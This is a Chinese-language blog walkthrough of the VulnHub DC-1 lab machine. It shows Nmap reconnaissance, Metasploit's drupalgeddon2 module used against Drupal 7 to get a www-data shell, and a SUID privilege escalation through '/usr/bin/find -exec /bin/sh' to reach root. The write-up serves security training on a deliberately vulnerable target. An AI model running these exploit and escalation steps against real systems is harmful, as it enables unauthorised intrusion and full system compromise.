希望和各位大佬一起学习，如果文章内容有错请多多指正，谢谢！  

个人博客链接：CH4SER的个人BLOG – Welcome To Ch4ser's Blog

DC-1 靶机下载地址：DC: 1 ~ VulnHub

0x01 信息收集

Nmap扫描目标主机，发现开放22、80、111、40884端口，分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。

​

访问80端口是一个Drupal的登录页面。Wappalyzer显示CMS为Drupal 7，编程语言为PHP，操作系统为Debian。

​

0x02 Web漏洞利用 - drupalgeddon2

MSF搜索Drupal，使用payload：exploit/unix/webapp/drupal_drupalgeddon2，成功拿到Web权限www-data。

msf6 > search drupal
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.196.137
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 80
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run

​

0x03 权限提升 - SUID

上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下，给予执行权限执行。

辅助项目下载地址：GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

检测到可利用的SUID文件/usr/bin/find 

查询GTFOBins得知find的SUID提权方式如下，启用一个新的root权限的bash。

/usr/bin/find . -exec '/bin/sh' \;

SUID提权成功，拿到root权限和最终flag。